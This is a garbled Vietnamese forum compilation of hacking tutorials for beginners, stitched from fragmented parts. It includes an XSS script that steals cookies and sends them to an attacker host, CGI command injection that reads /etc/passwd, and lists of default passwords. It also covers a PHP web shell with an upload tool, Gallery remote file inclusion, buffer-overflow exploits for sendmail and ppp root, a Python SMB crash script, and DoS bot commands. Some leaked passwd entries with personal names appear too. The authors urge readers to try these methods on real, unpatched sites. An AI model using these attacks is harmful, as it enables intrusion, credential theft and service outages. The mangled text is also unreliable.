Good tool ch ???? hihihi, cn khong 3-4 Tool na ti ang vit, s hng dn cc
bn s dng c hiu qu sau, lm th no nh u trng mi khoi ... he he he
QUOTE
.....
<form action="" method="post" name="settings" >
.....
<select class=search name=status>
<option value=0>Admin </option>
<option value=1>Moderator</option>
<option selected value=2>Member</option>
<option value=3>Banned</option>
</select>
.....
By gi hy m trang web ln v nhn "submit" no,vn khng c chuyn
g xy ra c sao vy qun xem ch ny:
<form action="" th khi nhn "submit" th n truyn d liu l cc bin cho
file n ang load vy ta hy sa li mt t nh ta copy url trn trnh duyt m
ta ang lu file v d:
QUOTE
http://www.tinhban.com/phpbb/member.php
vy s tr thnh nh sau:
QUOTE
.....
<form action="http://www.tinhban.com/phpbb/member.php" method="post"
name="settings" >
.....
<select class=search name=status>
<option value=0>Admin </option>
<option value=1>Moderator</option>
<option selected value=2>Member</option>
<option value=3>Banned</option>
</select>
.....
Chn m lnh:
y l k thut chn m lnh vo trang Web t my khch. K thut ny cho
php hacker a m lnh thc thi vo phin lm vic trn Web ca mt
ngi dng khc. Khi on m lnh ny chy, n s cho php hacker lm
th chuyn, t gim st phin lm vic trn Web cho n ton quyn iu
khin my tnh ca kh ch.
Mt v d in hnh l li ca web dng cgi cc hacker c th dng lnh
unix trn trnh duyt ca mnh nh v d sau:
QUOTE
http://target/index.cgi?page=index.cgi
http://target/index.cgi?page=index.cgi >xem m ngun file index.cgi
http://target/index.cgi?page=index.cgiswd >xem file passwd ca server
http://target/index.cgi?page=index.cgils -la
http://target/index.cgi?page=index.cgi
http://target/index.cgi?page=index.cgi >dng lnh unix
Bn phi linh hot trong cch tn cng ca mnh
7-Khng cn log-in:
Nu ng dng khng c thit k cht ch, khng rng buc trnh t cc
bc khi duyt ng dng th y s l mt l hng bo mt v hacker c th
li dng truy cp thng n cc trang thng tin bn trong m khng cn
phi qua bc ng nhp.
8-Eavesdropping(nghe trm):
Mt cch chung chung phn ln cc h thng mng truyn t thng tin qua
mng khng cht chn lm,nn n gip cc Attacker c th truy cp vo data
paths "listen in" hoc "read" lung d liu chuyn qua.Khi cc Attacker
nghe trm s truyn t thng tin n s chuyn n "sniffing" or
"snooping".Nng lc ca nghe trm l gim st h thng mng n s thu
thp c nhng thng tin qu gi v h thng ,c th l mt packet cha
passwd v user.Cc chng trnh ny gi l cc "sniffing" c nhim v lng
nghe cc cng ca mt h thng m cc hacker mun tn cng,n s thu
thp cc d liu chuyn qua cc cng ny v chuyn v cho cc attacker.
9-Data Modification(thay i d liu):
###################################################
####################
Author by : Anhdenday ( Staff of HVA ), and Hackertt ( Staff of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by
: PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net
###################################################
####################
T bch : Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ?
Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mt cch
tng qut , hiu cc thut ng m nhng ngi rnh v mng hay s dng . Ring
ti th cha tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt
s kin thc c bn , mun chia s cho tt c cc bn , nhm cng cc bn hc hi .
Ti s khng chu trch nhim nu cc bn dng n quy ph ngI khc . Cc
bn c th copy hoc post trong cc trang Web khc nhng hy in tin tc gi
dI bi , tn trng bi vit ny cng chnh l tn trng ti v cng sc ca ti ,
ng thI cng tn trng chnh bn thn cc bn . Trong ny ti cng c chn thm
mt s cch hack , crack v v d cn bn , cc bn c th ng dng th v nghin
ging tip thng qua dual homed host hoc thng qua s kt hp gia bastion host
v screening rounter.
( Bi vit ca Z3RON3 ti liu ca HVA )
8 . ) Unix l g ?
_ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht ,
v thn thit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH
ny khng th thiu i vI bn . N c s dng h tr cho lp trnh ngn ng C .
9 . ) Telnet l g ?
_ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng
( port ) . MI my tnh hoc my ch ( server ) u c cng , sau y l mt s cng
thng dng :
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois
_ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 .
10 . ) Lm th no bit mnh Telnet n h thng Unix ?
_ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn
kt ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du
nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix
c ngoI tr chng xut hin thng bo trc ch log in : nh v d :
Welcome to SHUnix. Please log in .)
By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l .
Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account
vo , bn s thy c mt mt khu , bn hy th nhp Default Password th theo
bng sau :
Account-------------------------Default Password
Root-----------------------------------------------Root
Sys------------------------------------------------Sys / System / Bin
Bin-------------------------------------------------Sys / Bin
Mountfsy------------------------------------------Mountfsys
Nuuc-----------------------------------------------Anon
Anon-----------------------------------------------Anon
User------------------------------------------------User
Games---------------------------------------------Games
Install----------------------------------------------Install
Demo-----------------------------------------------Demo
Guest----------------------------------------------Guest
11 . ) shell account l ci g ?
_ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI (
nhng ng dn sau :
CODE
AIX 3 /etc/security/passwd !
or /tcb/auth/files/<first letter #of username>/<username>
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/<first letter *of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct =##username
SunOS 5.0 /etc/shadow
<optional NIS+ private secure
maps/tables/whatever>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb =20
Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo
h thng tht s bn mun ly rI ln theo ng dn pha sau du /u tin .
V cuI cng l nhng account passwd m ti tng crack c , c th by gi n
ht hiu lc rI :
CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh
bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc
bn hy tm hiu thng tin c c t chng xem .
( (Ht phn 1 )
Cn rt nhiu nh ngha cng nh th thut hack v crack khc ti mun cng chia
s vI cc bn , c bit l cc bn Newbie . Ti s ln lt post ln trong thi gian
ti , mong c s ng gp kin ca cc bn nhng phn sau c vit hay
hn .
Hy nh , hack cng l mt ngh thut v rt cn s ham thch hc hi cng nh s
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03
xong rI bn hy xo file 'getadmin.exe', v 'gasys.dll' t 'cgi-bin' . Mc ch khi ta
xm nhp h thng ny l chm pass ca admin ln sau xm nhp mt cch
hp l , do bn hy tm file SAM ( cha pass ca admin v member ) trong h
thng rI dng chng trnh l0pht crack crack pass ( Hng dn v cch s
dng l0pht crack v 3.02 ti post ln ri ,cc bn hy t nghin cu nh ) . y
l link : http://vnhacker.org/forum/?act=ST&f=6&t=11566&s=
Khi crack xong cc bn c user v pass ca admin rI , by gi hy xo account
ca user ( ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h
thng l tu thch , nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm .
Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti
my m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian
hn .
phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt
Web site , v lm th no hack mt trang web n gin nht .v.v
GOOKLUCK !!!!!!
( (Ht phn 2 )
Bi vit ca ANHDENDAY
Vd : vI a ch IP 192.168.0.1 th
192.168.0 l a ch mng cn 1 l a ch host . Cc my c th cng a ch mng
nhng bt buc phI khc a ch host .
2-Lm sao ly c a ch IP ca mt ngi , mt website hay mt my tnh
khc ?
*Gi s bn mun ly a ch IP ca www.yahoo.com . Bn lm n gin nh sau .
Thot ra DOS . Bn g
C:\windows>ping www.yahoo.com
Pinging yahoo.com [216.115.108.245] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Here 216.115.108.245 is the ip address of www.yahoo.com
*Cng nh vy, nu bn mun ly 1 a ch IP ca 1 my tnh tn PC2 trong 1 mng
LAN bn s c c a ch IP ca PC2
C:\windows>ping PC2
*Ly IP ca mt ngi ang chat vi mnh :
-S dng ICQ
Ch cn hi anh ta c ng ni vi bn trn ICQ, nu c s tr li c ngha kt ni
c thc hin . Trong khi ang chat bn tm thot ra DOS v g netstat -n v bn
s ly c a ch IP ca anh ta . Nhng bn phi chc chn rng bn khng s
dng bt k 1 phn mm no lin kt vi Internet khc bi v iu c th cho bn
nhiu a ch IP gm a ch ca anh ta v nhng dch v bn ang kt ni s c
xut ra khi g netstart -n (bi sau s ni r hn v cc lnh ca netstart)
-S dng MSN v YAHOO MESSENGERS
Trong trng hp s dng cc chng trnh Yahoo hay MSN chat. Nu bn s
dng lnh netstart -n bn s khng ly c a ch IP ca ngi mnh ang chat .
Chng ta lm cch no ly y ??? C mt cch l . Bn ni rng bn s gi
cho anh ta 1 bi nhc rt hay hoc l 1 th g bng cch SEND FILE . Nu anh ta
ng bn hy gi cho anh ta 1 file m anh ta thch . Trong khi file c gi i bn
tm thot ra DOS v g lnh netstart -n v bn s tm thy a ch ca anh ta v khi
gi 1 file th s kt ni ca bn v anh ta l trc tip khng phi qua server ca
Yahoo hay MSN x l
-Ly a ch IP ca nhng ngi n thm website ca bn
Bn c 1 website v bn mun ly cc a ch IP ca nhng ngi n thm website
hoc
CODE
<?php
if ($contents && $header){
mail("victim@yahoo.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
echo "nope";
}
(Bn hy sa ci victim@yahoo.com thnh a ch Mail ca bn ) .
Bn hy save ci notepad ny vi tn < tn tu cc bn >.php ( Nh l phi c
.php ) ri upload ln mt host no c h tr PHP , trong VD ca ti l abc.php .
( i vi cc bn tng lm Web chc s rt d phI khng ? ) . on m ny s
c nhim v n cp thng tin (v c khi c c cookie ) ca nn nhn khi h m d
liu c cha on m ny rI t ng save thng tin thnh file < ip ca nn nhn
>.txt .
_ Cn mt cch na ly cookie c s dng trn cc forum b li nhng cha
fix , khi post bi bn chi cn thm on m sau vo bi ca mnh :
CODE
document.write('<img src=http://host_php/abc.php?abc='+escape(document.cookie)
+'>')
vi host_php : l a ch bn upload file n cp cookie ln .
v abc.php l file VD ca ti .
_ V d : khi p dng trong tag img, ta dng nh sau:
CODE
[img]javascript: Document.write('<img src=http://host_php/docs.php?
docs='+escape(document.cookie)+'>')[/img]
hoc:
[
CODE
img]javascript: Document.write('<img src=http://host_php/docs.php?
docs='+escape(document.cookie)+'>')[/img]
_ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch
vo google.com tm nhng forum b li ny bng t kho "Powered by .. forum
vi nhng forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz .
Nu cc bn may mn cc bn c th tm thy nhng forum cha fix li ny m thc
hnh , ai tm c th chia s vi mi ngi nh .
_ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm .
22 . ) Cch ngt mt khu bo v Website :
_ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn
trang Web khi bn vo s b chn li v s xut hin mt box yu cu nhp mt
khu , y chnh l khu vc ring t ct du nhng thng tin mt ch dnh cho s
ngi hoc mt nhm ngi no ( Ni ct ngh hack ca viethacker.net m
bo e-chip ni ti chng hn ) . Khi ta click vo ci link th ( thng thng ) n
s gi ti .htpasswd v .htaccess nm cng trong th mc bo v trang Web . Ti
sao phi dng du chm trc trong tn file '.htaccess'? Cc file c tn bt u l
mt du chm '.' s c cc web servers xem nh l cc file cu hnh. Cc file ny
s b n i (hidden) khi bn xem qua th mc c bo v bng file .htaccess
.Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton m bn mun
xm nhp . Mt ci qun l mt khu v user name , mt ci qun l cng vic
m ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m
ra . Bn hy nhn VD sau :
CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f
Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ?
D nhin l khng ri . bn c hiu v sao khng m bn khng th c c chng
khng ? ci ny n c s can thip ca thng file .htaccess . Do khi cng trong
cng th mc chng c tc ng qua li bo v ln nhau nn chng ta cng
khng di g m c gng t nhp ri crack m mt khu cht tit ( khi cha c
ngh crack mt khu trong tay . Ti cng ang nghin cu c th xm nhp
trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y , chuyn g s
xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta s chm
c n d dng , bn hy xem link VD sau :
http://www.company.com/cgi-bin/protected/
hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp
URL sau :
http://www.company.com/cgi-bin/protected/.htpasswd
Nu bn thy c cu tr lI 'File not found' hoc tng t th chc chn file ny
khng c bo v , bn hy tm ra n bng mt trong cc URL sau :
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
_ Li th 2 : li php.cgi
+ Tng t trn bn ch cn nh trn URL dng sau ly pass :
http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc
hnh rt kh , cc bn hy vo trang google.com ri nh t kho :
/cgi-bin/php.cgi?/etc/passwd]
hoc cgi-bin/nph-test-cgi?/etc
sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh .
25 . ) K thut xm nhp my tnh ang online :
_ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th
ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc
s dng trn my ca nn nhn s b chm i mt cch ng k v nhng my
h khng share th khng th xm nhp c, do nu h tt my l mnh s b
cng cc khi cha kp chm account , c mt cch m thm hn , t lm gim tc
hn v c th xm nhp khi nn nhn khng share l dng chng trnh DOS tn
cng . Ok , ta s bt u :
_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu .
_ Vo Start ==> Run g lnh cmd .
_ Trong ca s DOS hy nh lnh net view <IP ca nn nhn>
CODE
+ VD : c:\net view 203.162.30.xx
_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh
net use < a bt k trn my ca bn> : <ip ca nn nhn>< share ca nn
nhn>
+ VD : c:\net use E : 203.162.30.xxC
_ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy
download chng trnh d passwd v s dng ( theo ti bn hy load chng trnh
pqwak2 p dng cho vic d passwd trn my s dng HH Win98 hoc Winme v
chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai
chng trnh tng t nhau , dng u ta nh IP ca nn nhn , dng th hai ta
nh tn a share ca nn nhn nhng i vi xIntruder ta ch chnh Delay
ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trong mng Internet
l trn dI 5000 .
_ Nu my ca nn nhn khng c share th ta nh lnh :
net use < a bt k trn my ca bn> : <ip ca nn nhn>c$ (hoc
d$)"administrator"
system($shell);
echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";}
echo "</body></html>";
?>
on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m )
v t tn l :
+ shellphp.php : file ny dng chy shell trn victim host .
+ init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload
file init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun
upload file ny ln l tiu )
Bn hy to thm mt file PHP vi m sau :
CODE
<?php
function handleupload() {
if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
$filename = $_FILES['userfile']['tmp_name'];
print "$filename was uploaded successfuly";
$realname = $_FILES['userfile']['name'];
print "realname is $realname\n";
print "copying file to uploads dir ".$realname;
copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); [B]// lu *PATH* chng
ta s thay i sau[/B]
} else {
echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";
}
}
if ($act == "upload") {
handleupload();
}
echo "<html><body>
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?
$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>
</form>
</body></html>";
?>
Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn .
_ Tip theo Bn vo Google, g "Powered by gallery" ri enter, Google s lit k mt
ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link
sau th xem n cn mc lI Gallery hay khng :
http://<tn trang Web ca nn nhn>/gallery./captionator.php?
GALLERY_BASEDIR=http://wwwxx.brinkster.com/<tn host bn va ng k>/
Bi vit ca ANHDENDAY
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
-f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
[/quote]
V y l mt l hng kh. Ti s ch ra cch li dng l hng PINE bng Linux. Bng
cch xem process table bng ps bit user no chy PINE, sau thc hin lnh ls
in /tmp/ thu thp lockfile names cho mi user. Xem process table mt ln na s
hin ra mi user thot PINE hoc xem message trong INBOX.
To link t /tmp/.hamors_lockfile ti ~hamors/.rhosts s lm cho PINE to
~hamors/.rhosts l file dng 666 vi ni dung l PINE's process id. By gi c th
dng lnh echo "+ +" > /tmp/.hamors_lockfile, sau rm /tmp/.hamors_lockfile.
Th d, hamors l nn nhn v catluvr tn cng:
[Quote ]
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell;
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
[/quote]
By gi bn vo c root. "What's next?" Ty bn nhng ti mun khuyn bn
nn i password trc khi xa hay thay i cc th. thay i password bn phi
login bng telnet v login vi account mi. Sau ch cn nh: [I]passwd n s hi
pw c v pw mi. By gi ch c bn mi c pw v n c th ko di thi gian bn
upload, delete logs file v lm nhng g bn mun.
Rt cm n s ng h ca cc bn , v y l phn 5
31 . ) Gi tin TCP/IP l g?
TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol, mt Gi tin
TCP/IP l mt khi d liu c nn, sau km thm mt header v gi n
mt my tnh khc. y l cch thc truyn tin ca internet, bng cch gi cc gi
tin. Phn header trong mt gi tin cha a ch IP ca ngi gi gi tin. Bn c th
vit li mt gi tin v lm cho n trong ging nh n t mt ngi khc!! Bn c
th dng cch ny tm cch truy nhp vo rt nhiu h thng m khng b bt.
Bn s phi chy trn Linux hoc c mt chng trnh cho php bn lm iu ny.
32 . ) Linux l gi`:
_Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m
trch chc v lin lc gia cc chng trnh ng dng my tnh v phn cng. Cung
cp cc chng nng nh: qun l file, qun l b nh o, cc thit b nhp xut
nhng cng, mn hnh, bn phm, .... Nhng Nhn Linux cha phi l 1 HH, v
(Request.QueryString("login"));
var password = var TempStr = RemoveBad
(Request.QueryString("password"));
_ Vy l ta fix xong li .
_ Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu ,
cc bn hy test th xem i , cc trang Web Vit Nam mnh b nhiu lm , ti
kim c kha kh pass admin bng cch th ny ri ( nhng cng bo h fix
li ) .
_ C nhiu trang khi login khng phi bng ' or ''= m bng cc nick name c
tht ng k trn trang Web , ta vo link thnh vin kim nick ca mt
admin test th nh .
Hack vui v .
====================================================
phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu
tn cng li hi lm cho trang Web hng mnh nh HVA ca chng ta b tt
nghn ch trong thI gian ngn cc admin bn i ung cafe ht m khng ai trng coi
. Km theo l cc phng php tn cng DoS v ang c s dng .
GOOKLUCK!!!!!!!!!!!!!!!!!!!!
( Ht phn 5 )
Bi vit ca ANHDENDAY .
V y l phn 6
38 . ) DoS attack l g ? ( Denial Of Services Attack )
_ DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi , vi loi
tn cng ny , bn ch cn mt my tnh kt ni Internet l c th thc hin vic
tn cng c my tnh ca I phng . thc cht ca DoS attack l hacker s
chim dng mt lng ln ti nguyn trn server ( ti nguyn c th l bng
thng, b nh, cpu, a cng, ... ) lm cho server khng th no p ng cc yu
cu t cc my ca ngui khc ( my ca nhng ngi dng bnh thng ) v server
c th nhanh chng b ngng hot ng, crash hoc reboot .
39 . ) Cc loi DoS attack hin ang c bit n v s dng :
a . ) Winnuke :
_DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x .
Hacker s gi cc gi tin vi d liu "Out of Band" n cng 139 ca my tnh ch.
( Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of
Band c bt ) . Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh
bo li s c hin th ln vi nn nhn do chng trnh ca Windows nhn c
cc gi tin ny nhng n li khng bit phn ng vi cc d liu Out Of Band nh th
no dn n h thng s b crash .
b . ) Ping of Death :
_ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc ln thng qua
lnh ping n my ch th h thng ca h s b treo .
_ VD : ping l 65000
c . ) Teardrop :
_ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h
thng ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh
nh h thng ngun, mi mnh u phi c mt gi tr offset nht nh xc nh
v tr ca mnh trong gi d liu c chuyn i. Khi cc mnh ny n h thng
ch, h thng ch s da vo gi tr offset sp xp cc mnh li vi nhau theo
th t ng nh ban u . Li dng s h , ta ch cn gi n h thng ch mt
lot gi packets vi gi tr offset chng cho ln nhau. H thng ch s khng th
no sp xp li cc packets ny, n khng iu khin c v c th b crash, reboot
hoc ngng hot ng nu s lng gi packets vi gi tr offset chng cho ln
nhau qu ln !
d . ) SYN Attack :
_ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch
ip ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr
li cc a ch khng c thc v ch I nhn thng tin phn hi t cc a ch
ip gi . V y l cc a ch ip khng c thc, nn h thng ch s s ch i v ch
v cn a cc "request" ch i ny vo b nh , gy lng ph mt lng ng k
b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i
thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a
crud = (
# Yu cu SMBnegprot
"""
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
""",
# Yu cu setup SMB X
"""
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
""",
# Yu cu SMBtconX
"""
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
""",
# Yu cu khI to SMBnt X
"""
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
""",
# yu cu bin dch SMB
"""
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
""",
# SMBtrans Request
"""
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack('!BBH', type, flags, len(data))
#print 'send:', b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
type, flags, length = struct.unpack('!BBH', s)
data = sock.recv(length)
assert(len(data) == length)
#print 'recv:', b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
return s
def main(host, port=139):
s = socket(AF_INET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == '__main__':
print 'Sending poison...',
main(sys.argv[1])
print 'done.'
c th lm down c server ca i phng bn cn phi c thi gian DoS , nu
CODE
die------------------------------------------------------------Shutdown.
quit------------------------------------------------------------Log off.
mtimer N----------------------------------------------------t thI gian tn cng DoS
, vI N nhn gi tr t 1--> 1999 giy .
dos IP-------------------------------------------------------Tn cng n mt a ch IP
xc nh .
mdie pass---------------------------------------------------V hiu ho tt c cc
Broadcast , nu nh passwd chnh xc . Mt lnh c gi ti ("d1e l44adsl")
Chc nng chnh ca firewall l kim sot lung thng tin t gia Internet v
Intranet.Thit lp c ch iu khin dng thng tin gia mng bn trong (Intranet)
vmng Internet.VD:
Cho php hoc khng cho php nhng dch v truy cp ra ngoi (T Intranet ra
